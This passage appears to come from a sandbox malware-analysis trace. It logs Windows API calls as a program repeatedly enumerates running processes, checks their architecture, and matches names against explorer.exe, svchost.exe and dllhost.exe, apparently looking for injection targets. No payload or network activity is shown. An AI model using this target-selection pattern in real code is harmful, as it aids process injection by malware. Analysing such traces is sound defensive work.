szExeFile="doctrine alcohol.exe")) returned 1 [0261.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0261.943] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.943] CloseHandle (hObject=0xd8) returned 1 [0261.943] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0261.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0261.944] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.944] CloseHandle (hObject=0xd8) returned 1 [0261.944] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0261.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0261.944] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0261.945] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0261.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0261.945] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0261.946] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0261.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0261.946] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0261.947] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.947] CloseHandle (hObject=0xd8) returned 1 [0261.947] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0261.947] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0261.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0261.947] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.947] CloseHandle (hObject=0xd8) returned 1 [0261.947] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0261.947] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0261.948] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0261.948] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0261.948] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.948] CloseHandle (hObject=0xd8) returned 1 [0261.948] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0261.949] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.949] CloseHandle (hObject=0xd8) returned 1 [0261.949] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0261.949] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0261.949] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0261.949] CloseHandle (hObject=0xd8) returned 1 [0261.949] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.950] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0261.950] CloseHandle (hObject=0xd4) returned 1 [0261.950] Sleep (dwMilliseconds=0x3e8) [0263.071] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0263.074] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0263.074] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0263.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0263.075] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0263.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0263.075] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0263.076] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0263.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0263.076] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0263.077] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0263.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0263.077] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0263.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0263.078] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0263.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0263.078] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0263.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0263.079] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0263.079] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0263.080] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0263.080] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.080] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0263.081] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0263.081] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0263.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0263.081] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0263.082] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0263.082] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0263.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0263.083] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.083] CloseHandle (hObject=0xd8) returned 1 [0263.083] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0263.083] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0263.083] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0263.083] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0263.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0263.084] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0263.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0263.084] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.084] CloseHandle (hObject=0xd8) returned 1 [0263.084] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0263.084] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0263.084] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0263.084] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0263.085] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0263.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0263.085] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0263.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0263.086] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.086] CloseHandle (hObject=0xd8) returned 1 [0263.086] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0263.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0263.086] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.086] CloseHandle (hObject=0xd8) returned 1 [0263.086] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0263.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0263.087] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.087] CloseHandle (hObject=0xd8) returned 1 [0263.087] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0263.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0263.088] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.088] CloseHandle (hObject=0xd8) returned 1 [0263.088] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0263.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0263.088] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.088] CloseHandle (hObject=0xd8) returned 1 [0263.088] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0263.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0263.089] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.089] CloseHandle (hObject=0xd8) returned 1 [0263.089] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0263.089] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0263.089] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.089] CloseHandle (hObject=0xd8) returned 1 [0263.089] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0263.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0263.090] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.090] CloseHandle (hObject=0xd8) returned 1 [0263.090] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0263.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0263.091] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.091] CloseHandle (hObject=0xd8) returned 1 [0263.091] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0263.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0263.091] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.091] CloseHandle (hObject=0xd8) returned 1 [0263.091] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0263.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0263.092] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.092] CloseHandle (hObject=0xd8) returned 1 [0263.092] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0263.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0263.092] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.092] CloseHandle (hObject=0xd8) returned 1 [0263.092] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0263.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0263.093] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.093] CloseHandle (hObject=0xd8) returned 1 [0263.093] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0263.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0263.093] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.094] CloseHandle (hObject=0xd8) returned 1 [0263.094] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0263.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0263.094] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.094] CloseHandle (hObject=0xd8) returned 1 [0263.094] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0263.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0263.095] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.095] CloseHandle (hObject=0xd8) returned 1 [0263.095] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, 